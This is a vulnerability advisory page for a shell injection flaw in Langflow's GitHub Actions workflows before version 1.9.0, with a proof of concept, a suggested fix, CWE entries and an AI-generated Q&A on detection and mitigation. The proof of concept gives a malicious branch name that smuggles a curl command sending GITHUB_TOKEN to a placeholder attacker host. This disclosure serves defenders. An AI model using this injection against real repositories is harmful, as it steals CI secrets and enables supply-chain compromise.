CVE-2026-33475
Received Received - Intake
Shell Injection in Langflow GitHub Actions Allows Secret Exfiltration

Publication date: 2026-03-24

Last updated on: 2026-03-24

Assigner: GitHub, Inc.

Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-24
Last Modified
2026-03-24
Generated
2026-05-07
AI Q&A
2026-03-24
EPSS Evaluated
2026-05-05
NVD
CVE-2026-33475
EUVD
EUVD-2026-14790
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
langflow langflow to 1.9.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-33475 is a critical unauthenticated remote shell injection vulnerability in multiple GitHub Actions workflows of the Langflow repository prior to version 1.9.0.

The issue arises because GitHub context variables like `${{ github.head_ref }}` or `${{ github.event.pull_request.title }}`, which can contain user-controlled input such as branch names or pull request titles, are directly interpolated into shell commands in `run:` steps without proper quoting or sanitization.

This allows an attacker to inject and execute arbitrary shell commands during CI/CD execution by crafting malicious branch names or pull request titles.

For example, an attacker can create a branch named with shell commands that exfiltrate secrets like the `GITHUB_TOKEN` when the workflow runs.


How can this vulnerability impact me? :

This vulnerability can lead to remote code execution within the CI environment, allowing attackers to gain full access to CI secrets such as the `GITHUB_TOKEN`.

  • Exfiltration of sensitive secrets and tokens.
  • Manipulation of infrastructure by pushing malicious tags or images.
  • Tampering with software releases.
  • Supply chain compromise during CI/CD execution.

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by inspecting the GitHub Actions workflows in the Langflow repository for unsanitized interpolation of GitHub context variables directly inside `run:` shell command steps.'}, {'type': 'paragraph', 'content': 'Specifically, look for usage of variables like `${{ github.head_ref }}`, `${{ github.event.pull_request.title }}`, or custom inputs interpolated directly in `run:` commands without proper quoting or sanitization.'}, {'type': 'paragraph', 'content': 'A practical detection method is to review the workflow YAML files in `.github/workflows/` and `.github/actions/` for lines similar to:'}, {'type': 'list_item', 'content': 'run: echo "Branch: ${{ github.head_ref }}"'}, {'type': 'list_item', 'content': 'run: npx playwright install ${{ inputs.browsers }} --with-deps'}, {'type': 'paragraph', 'content': 'Since this vulnerability involves shell injection via malicious branch names or pull request titles, you can also monitor your CI logs for unexpected shell commands or network calls triggered by such inputs.'}, {'type': 'paragraph', 'content': 'There are no specific detection commands provided, but reviewing workflow files for direct interpolation of user-controlled variables in `run:` steps is the key detection approach.'}] [1]


What immediate steps should I take to mitigate this vulnerability?

[{'type': 'paragraph', 'content': 'To mitigate this vulnerability immediately, refactor the affected GitHub Actions workflows to avoid direct interpolation of user-controlled variables inside `run:` shell command steps.'}, {'type': 'paragraph', 'content': 'Instead, assign these variables to environment variables and wrap them in double quotes to ensure proper sanitization and prevent shell injection.'}, {'type': 'list_item', 'content': 'Use environment variables like: `env: BRANCH_NAME: ${{ github.head_ref }}`'}, {'type': 'list_item', 'content': 'Modify `run:` steps to reference these environment variables with proper quoting, for example: `echo "Branch is: \\"$BRANCH_NAME\\""`'}, {'type': 'paragraph', 'content': 'Additionally, upgrade Langflow to version 1.9.0 or later, where this vulnerability has been patched.'}, {'type': 'paragraph', 'content': 'Avoid using unsanitized user-controlled inputs directly in shell commands within workflows.'}] [1]


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart